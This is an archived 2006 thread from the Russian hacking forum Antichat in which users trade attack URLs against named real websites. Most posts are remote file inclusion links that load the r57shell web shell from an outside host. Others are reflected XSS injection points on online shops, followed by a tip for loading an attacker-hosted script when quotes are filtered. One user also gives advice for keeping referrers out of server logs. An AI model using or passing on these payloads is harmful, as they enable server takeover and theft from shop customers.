Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Баги... (https://forum.antichat.xyz/showthread.php?t=16978)

Mobile 03.04.2006 16:27

Баги...
 
http://www.articleposts.com/index.ph.../r57shell.txt?
http://www.masters-level-publishing..../r57shell.txt?
http://www.freecontentarticles.net/i.../r57shell.txt?
http://www.instantmarketingsuccess.c.../r57shell.txt?
http://www.verkkokoulu.fi/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))
http://www.kaipolanvire.fi/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))
http://www.jokilaaksonlentopallo.fi/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))
http://www.schooljournals.net/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))
http://www.ejournal.fi/esp20/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))
http://halalguide.org/index.php?page.../r57shell.txt?

limpompo 03.04.2006 16:44

не плохо =)) +1

D1mOn 03.04.2006 17:46

желательно перед ссылкой ставить _, дабы в лога сервера не указывалось откуда пришли)))

+toxa+ 03.04.2006 18:35

Добавлю от себя немного))

_http://www.thinkprofits.com/hostingadmin/?path=http://rst.void.ru/download/r57shell.txt?
_http://www.hostingshop.com.au/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?
_http://www.arambunetwork.com/?path=http://rst.void.ru/download/r57shell.txt?
_http://www.successteam1.com/order/?path=http://rst.void.ru/download/r57shell.txt?
_http://clientes.webcom.com.mx/host/?path=http://rst.void.ru/download/r57shell.txt?

ЗЫ кста, чё за ось такая, Darwin ?

EST a1ien 03.04.2006 19:46

_http://www.clockshop.ru/readnews.php?nid=<script>...</script>
_http://www.home-shop.ru/search.php?r_search_str=<script>...</script>
_http://www.dostavka.ru/index.php?find=<script>...</script>level=5

В некоторых фильтруются кавычки по этому можно попробовать конструкцию вида <script scr=http://Мой_сат.ru/script.js></script>

Да кстати заметьте это всё магазины :)

+toxa+ 03.04.2006 19:57

Кста, вот ещё нашёл, только не смог доковырять.... ТУТ


Время: 06:02